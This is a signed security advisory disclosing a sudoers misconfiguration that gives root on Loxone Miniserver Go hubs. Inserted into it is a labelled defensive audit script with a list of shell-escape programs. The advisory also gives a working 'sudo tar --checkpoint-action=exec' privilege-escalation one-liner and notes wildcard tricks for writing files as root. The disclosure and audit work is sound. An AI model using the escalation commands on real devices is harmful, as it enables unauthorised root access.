-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2023-004
Product: Miniserver Go Gen.2
Manufacturer: Loxone
Affected Version(s): <14.0.3.28
Tested Version(s): 14.0.3.28, 13.1.11.17
Vulnerability Type: Execution with Unnecessary Privileges (CWE-250)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2023-04-19
Solution Date: tba
Public Disclosure: 2023-06-30
CVE Reference: CVE-2023-36624
Author of Advisory: Tobias Jäger, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Loxone Miniserver Go is a smart home hub. The manufacturer describes the
product as follows (see [1]):

"The Loxone Miniserver Go serves as central control unit for all kinds of
automation tasks."

Due to a misconfiguration of the sudoers file, the device is vulnerable to
a local privilege escalation from the unprivileged user "lx" to root.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Linux-based firmware uses "lx" as its low-privileged user and relies
on sudo to run selected commands with higher privileges. For a number of
binaries, "lx" may do so without entering a password (NOPASSWD). Some of
these binaries allow the execution of arbitrary code, for example the
archive tool tar.
The user "lx" is allowed to execute the following binaries with root
privileges without entering a password:

lx ALL=NOPASSWD: /usr/sbin/dumpe2fs -h /dev/mmcblk0p6, /usr/bin/ntpdate *, /usr/bin/lsof, \
    /usr/bin/tee /proc/sys/vm/drop_caches, /usr/bin/tee -a /var/log/*, \
    /usr/bin/openssl *, /usr/bin/tar *, \
    /usr/bin/systemctl restart systemd-networkd.service, \
    /usr/bin/updateflash /dev/mtd5 0x0 *, /usr/bin/systemctl reboot, \
    /usr/bin/systemctl restart pure-ftpd.service, \
    /usr/bin/systemctl stop starthomekit.service, \
    /usr/bin/systemctl restart starthomekit.service, \
    /usr/bin/systemctl restart avahi-daemon, \
    /usr/bin/miniserverinit applytzdata *, \
    /usr/bin/eebus, /usr/bin/ssh*, /usr/bin/ln *, /usr/bin/journalctl *, /usr/bin/tee /var/log/*, \
    /usr/bin/hostnamectl *, /usr/bin/killall *, \
    /usr/bin/chmod 644 /etc/factory/*, \
    /usr/bin/systemctl is-active --quiet *, \
    /usr/bin/cat /root/.ssh/known_hosts

For example, /usr/bin/tar can be used to execute arbitrary system commands
and therefore escalate privileges to the root user. tar is only one of
several such entries: /usr/bin/openssl *, /usr/bin/ssh* and /usr/bin/ln *
likewise allow code execution or arbitrary file writes as root, and because
sudo matches command arguments with fnmatch(3), where a "*" may also span
several arguments, rules such as /usr/bin/tee -a /var/log/* are wider than
they look.
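The following script is an added example, not part of the SySS advisory and not code from Loxone. It audits sudoers rules for exactly the pattern described above: NOPASSWD commands whose program is known (per GTFOBins) to spawn a shell or write files as root, and commands whose argument list contains an unrestricted wildcard. SAMPLE_SUDOERS is a constructed copy of the rule quoted above; HARDENED_SUDOERS and the wrapper /usr/local/sbin/lx-backup are a hypothetical replacement written for illustration, not a fix shipped by the vendor.

```shell
#!/bin/sh
# Added example: audit sudoers NOPASSWD rules for root code-execution paths.
# SAMPLE_SUDOERS mirrors the advisory's rule (constructed copy).
SAMPLE_SUDOERS='lx ALL=NOPASSWD: /usr/sbin/dumpe2fs -h /dev/mmcblk0p6, /usr/bin/ntpdate *, /usr/bin/lsof, \
    /usr/bin/tee /proc/sys/vm/drop_caches, /usr/bin/tee -a /var/log/*, \
    /usr/bin/openssl *, /usr/bin/tar *, \
    /usr/bin/systemctl restart systemd-networkd.service, \
    /usr/bin/updateflash /dev/mtd5 0x0 *, /usr/bin/systemctl reboot, \
    /usr/bin/systemctl restart pure-ftpd.service, \
    /usr/bin/systemctl stop starthomekit.service, \
    /usr/bin/systemctl restart starthomekit.service, \
    /usr/bin/systemctl restart avahi-daemon, \
    /usr/bin/miniserverinit applytzdata *, \
    /usr/bin/eebus, /usr/bin/ssh*, /usr/bin/ln *, /usr/bin/journalctl *, /usr/bin/tee /var/log/*, \
    /usr/bin/hostnamectl *, /usr/bin/killall *, \
    /usr/bin/chmod 644 /etc/factory/*, \
    /usr/bin/systemctl is-active --quiet *, \
    /usr/bin/cat /root/.ssh/known_hosts'

# Hypothetical hardened rule (assumption, not a vendor fix): exact argument
# lists only; the tar use case moves into a root-owned, argument-less wrapper.
HARDENED_SUDOERS='lx ALL=NOPASSWD: /usr/sbin/dumpe2fs -h /dev/mmcblk0p6, /usr/bin/lsof, \
    /usr/bin/tee /proc/sys/vm/drop_caches, /usr/bin/systemctl reboot, \
    /usr/bin/cat /root/.ssh/known_hosts, /usr/local/sbin/lx-backup'

# Programs GTFOBins documents as giving a root shell or root file write when
# run via sudo with caller-controlled arguments.
SHELL_CAPABLE='tar openssl ssh ln journalctl'

# Join backslash-continued lines, then print each command of every
# NOPASSWD rule on its own line.
expand_rules() {
    printf '%s\n' "$1" | awk '
        { line = $0; sub(/[ \t]*\\[ \t]*$/, "", line) }
        /\\[ \t]*$/ { buf = buf line " "; next }
        { print buf line; buf = "" }
    ' | awk -F 'NOPASSWD:' '
        $2 != "" {
            n = split($2, c, ",")
            for (i = 1; i <= n; i++) {
                gsub(/^[ \t]+|[ \t]+$/, "", c[i])
                if (c[i] != "") print c[i]
            }
        }
    '
}

# Verdict for one command spec:
#   exec     - program known to spawn a shell or write files as root
#   wildcard - arguments contain "*"; sudo matches it with fnmatch(3) and
#              it may span several arguments ("tee -a /var/log/*" also
#              accepts "tee -a /var/log/x /etc/sudoers")
#   ok       - fixed program with a fixed argument list
classify() {
    spec=$1
    bin=${spec%% *}      # program path: first word
    name=${bin##*/}      # basename
    name=${name%\*}      # "/usr/bin/ssh*" -> "ssh"
    case " $SHELL_CAPABLE " in
        *" $name "*) echo exec; return ;;
    esac
    case $spec in
        *\**) echo wildcard; return ;;
    esac
    echo ok
}

# Print "<verdict><TAB><command>" for every NOPASSWD command in the text.
audit() {
    expand_rules "$1" | while IFS= read -r spec; do
        printf '%s\t%s\n' "$(classify "$spec")" "$spec"
    done
}

# Number of commands that received the given verdict (exec, wildcard, ok).
count_verdict() {
    audit "$1" | grep -c "^$2"
}

# Number of commands in the rule set.
rule_count() {
    expand_rules "$1" | grep -c .
}

main() {
    echo "== advisory rule =="
    audit "$SAMPLE_SUDOERS"
    echo "exec: $(count_verdict "$SAMPLE_SUDOERS" exec), wildcard: $(count_verdict "$SAMPLE_SUDOERS" wildcard)"
    echo "== hardened rule =="
    audit "$HARDENED_SUDOERS"
}

case ${1:-} in --run) main ;; esac
```

Run it with `sh audit.sh --run`. On a real device the effective rule set for the user can be dumped as root with `sudo -l -U lx` and fed to `audit` in place of the constructed sample; the check is deliberately conservative and only flags programs with a documented sudo escape or an unrestricted wildcard, so a clean result is not proof of safety.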
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

With the following command, the user "lx" executes whoami in the context
of the root user; tar runs the checkpoint action as root on the first
checkpoint, so any command can be substituted for whoami:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="whoami"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

No fix was available at the time of publication (solution status: open,
solution date: tba).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-01-19: Vulnerability discovered
2023-04-19: Vulnerability reported to manufacturer
tba: Patch released by manufacturer
2023-06-30: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for the Loxone Miniserver Go
    https://www.loxone.com/dede/kb/miniserver-go/
[2] SySS Security Advisory SYSS-2023-004
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-004.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Tobias Jäger of SySS GmbH.

E-Mail: tobias.jaeger@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Tobias_Jaeger.asc
Key ID: 0xABF0CF2F4D0220F9
Key Fingerprint: 5C9F 5312 F37E B9AB E87B 1212 ABF0 CF2F 4D02 20F9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEXJ9TEvN+uavoexISq/DPL00CIPkFAmSdKeQACgkQq/DPL00C
IPkboQ//aOBNlO7FCXTawgWoRXopVafie3zM1C/GgKt5cQNFqwmLNi8PB+3u6aO0
K2n4RtwCv7UYbpuV85nYe77OB4ApXQ7h0V2jRGzrekYGWOTZURsMfQ9EOtQfz6KX
eehmMYlgLP1TOU96MaS9R95sxujkIg2hKZAEFrWmz2yq8q6aL9uwkye3FttXl9mx
LKxP2CCKnzxmPezT9MyIdpOkVPnBn3uZQ2JvTrEe7NatTKHXqE1E72ZI/ur7X7D9
TCyBIr7ETGetHUqW/zFLNriruwjYilXiXahDV7jxwjOb+RtVv3MhkwVpyRjs1cOx
QNSHij+Myspoqryly7XjOn7B5MNvaQ0mSqu0xtavnIf9XtVoLQMVXyZN0tWgEDD6
iEBBdf8QM2rb1ce8Q+2UAQDFUkCCKtLL6Q0q/Swn4I7bG/Vm+MrDkD0k1MAdX6Rt
ukSU6+xFNbtT4zKcPdZCXTRk/aAZ9fQN1UATF8OkV1psGxEgXRZuleuLugt5c6+M
Ub7qGklBYq7OVnv9c54L9HXpLOTOX6hN+5uhnc3b1+SIN3U5YAALkfWO0b30t8Yr
ZC+XyrNcszTo7BqzO+/SRlHBAgigqoE7vNq74HV1o2T6MeYDZLWxF8RKTtJ9InpQ
n3RRYcrIvKAUHYRH12LodTXUMB6WLQAEn7Nj4+ofhiNdN0YoRBU=
=ev9p
-----END PGP SIGNATURE-----